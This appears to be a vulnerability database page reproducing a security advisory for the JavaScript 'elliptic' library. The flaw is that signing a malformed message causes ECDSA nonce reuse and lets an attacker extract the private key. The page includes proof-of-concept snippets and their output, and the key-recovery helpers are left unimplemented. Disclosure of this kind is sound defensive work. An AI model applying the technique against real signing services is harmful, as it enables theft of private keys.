Staging Environment: Content and features may be unstable or change without notice.
Search for vulnerabilities
Vulnerability details: VCID-zesp-6x93-1ke4
Vulnerability ID VCID-zesp-6x93-1ke4
Aliases GHSA-vjh7-7g9h-fjfh
Summary Elliptic's private key extraction in ECDSA upon signing a malformed input (e.g. a string) ### Summary Private key can be extracted from ECDSA signature upon signing a malformed input (e.g. a string or a number), which could e.g. come from JSON network input Note that `elliptic` by design accepts hex strings as one of the possible input types ### Details In this code: https://github.com/indutny/elliptic/blob/3e46a48fdd2ef2f89593e5e058d85530578c9761/lib/elliptic/ec/index.js#L100-L107 `msg` is a BN instance after conversion, but `nonce` is an array, and different BN instances could generate equivalent arrays after conversion. Meaning that a same `nonce` could be generated for different messages used in signing process, leading to `k` reuse, leading to private key extraction from a pair of signatures Such a message can be constructed for any already known message/signature pair, meaning that the attack needs only a single malicious message being signed for a full key extraction While signing unverified attacker-controlled messages would be problematic itself (and exploitation of this needs such a scenario), signing a single message still _should not_ leak the private key Also, message validation could have the same bug (out of scope for this report, but could be possible in some situations), which makes this attack more likely when used in a chain ### PoC #### `k` reuse example ```js import elliptic from 'elliptic' const { ec: EC } = elliptic const privateKey = crypto.getRandomValues(new Uint8Array(32)) const curve = 'ed25519' // or any other curve, e.g. secp256k1 const ec = new EC(curve) const prettyprint = ({ r, s }) => `r: ${r}, s: ${s}` const sig0 = prettyprint(ec.sign(Buffer.alloc(32, 1), privateKey)) // array of ones const sig1 = prettyprint(ec.sign('01'.repeat(32), privateKey)) // same message in hex form const sig2 = prettyprint(ec.sign('-' + '01'.repeat(32), privateKey)) // same `r`, different `s` console.log({ sig0, sig1, sig2 }) ``` #### Full attack This doesn't include code for generation/recovery on a purpose (bit it's rather trivial) ```js import elliptic from 'elliptic' const { ec: EC } = elliptic const privateKey = crypto.getRandomValues(new Uint8Array(32)) const curve = 'secp256k1' // or any other curve, e.g. ed25519 const ec = new EC(curve) // Any message, e.g. previously known signature const msg0 = crypto.getRandomValues(new Uint8Array(32)) const sig0 = ec.sign(msg0, privateKey) // Attack const msg1 = funny(msg0) // this is a string here, but can also be of other non-Uint8Array types const sig1 = ec.sign(msg1, privateKey) const something = extract(msg0, sig0, sig1, curve) console.log('Curve:', curve) console.log('Typeof:', typeof msg1) console.log('Keys equal?', Buffer.from(privateKey).toString('hex') === something) const rnd = crypto.getRandomValues(new Uint8Array(32)) const st = (x) => JSON.stringify(x) console.log('Keys equivalent?', st(ec.sign(rnd, something).toDER()) === st(ec.sign(rnd, privateKey).toDER())) console.log('Orig key:', Buffer.from(privateKey).toString('hex')) console.log('Restored:', something) ``` Output: ```console Curve: secp256k1 Typeof: string Keys equal? true Keys equivalent? true Orig key: c7870f7eb3e8fd5155d5c8cdfca61aa993eed1fbe5b41feef69a68303248c22a Restored: c7870f7eb3e8fd5155d5c8cdfca61aa993eed1fbe5b41feef69a68303248c22a ``` Similar for `ed25519`, but due to low `n`, the key might not match precisely but is nevertheless equivalent for signing: ```console Curve: ed25519 Typeof: string Keys equal? false Keys equivalent? true Orig key: f1ce0e4395592f4de24f6423099e022925ad5d2d7039b614aaffdbb194a0d189 Restored: 01ce0e4395592f4de24f6423099e0227ec9cb921e3b7858581ec0d26223966a6 ``` `restored` is equal to `orig` mod `N`. ### Impact Full private key extraction when signing a single malicious message (that passes `JSON.stringify`/`JSON.parse`)
Status Published
Exploitability None
Weighted Severity None
Risk None
Affected and Fixed Packages Package Details
Weaknesses (3)
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CWE-937 OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
CWE-1035 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
System Score Found at
cvssv4 9.0 https://github.com/indutny/elliptic
generic_textual CRITICAL https://github.com/indutny/elliptic
cvssv4 9.0 https://github.com/indutny/elliptic/commit/04cb6f54ce552b3ebde6be06d6050419e1c7333e
generic_textual CRITICAL https://github.com/indutny/elliptic/commit/04cb6f54ce552b3ebde6be06d6050419e1c7333e
cvssv4 9.0 https://github.com/indutny/elliptic/security/advisories/GHSA-vjh7-7g9h-fjfh
generic_textual CRITICAL https://github.com/indutny/elliptic/security/advisories/GHSA-vjh7-7g9h-fjfh
Reference id Reference type URL
https://github.com/indutny/elliptic
https://github.com/indutny/elliptic/commit/04cb6f54ce552b3ebde6be06d6050419e1c7333e
https://github.com/indutny/elliptic/security/advisories/GHSA-vjh7-7g9h-fjfh
GHSA-vjh7-7g9h-fjfh https://github.com/advisories/GHSA-vjh7-7g9h-fjfh
No exploits are available.
Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N Found at https://github.com/indutny/elliptic
Attack Vector (AV) Attack Complexity (AC) Attack Requirements (AT) Privileges Required (PR) User Interaction (UI) Vulnerable System Impact Confidentiality (VC) Vulnerable System Impact Integrity (VI) Vulnerable System Impact Availability (VA) Subsequent System Impact Confidentiality (SC) Subsequent System Impact Integrity (SI) Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none
Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N Found at https://github.com/indutny/elliptic/commit/04cb6f54ce552b3ebde6be06d6050419e1c7333e
Attack Vector (AV) Attack Complexity (AC) Attack Requirements (AT) Privileges Required (PR) User Interaction (UI) Vulnerable System Impact Confidentiality (VC) Vulnerable System Impact Integrity (VI) Vulnerable System Impact Availability (VA) Subsequent System Impact Confidentiality (SC) Subsequent System Impact Integrity (SI) Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none
Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N Found at https://github.com/indutny/elliptic/security/advisories/GHSA-vjh7-7g9h-fjfh
Attack Vector (AV) Attack Complexity (AC) Attack Requirements (AT) Privileges Required (PR) User Interaction (UI) Vulnerable System Impact Confidentiality (VC) Vulnerable System Impact Integrity (VI) Vulnerable System Impact Availability (VA) Subsequent System Impact Confidentiality (SC) Subsequent System Impact Integrity (SI) Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

No EPSS data available for this vulnerability.

Date Actor Action Source VulnerableCode Version
2026-06-12T07:53:38.897610+00:00 GithubOSV Importer Import https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-vjh7-7g9h-fjfh/GHSA-vjh7-7g9h-fjfh.json 38.6.0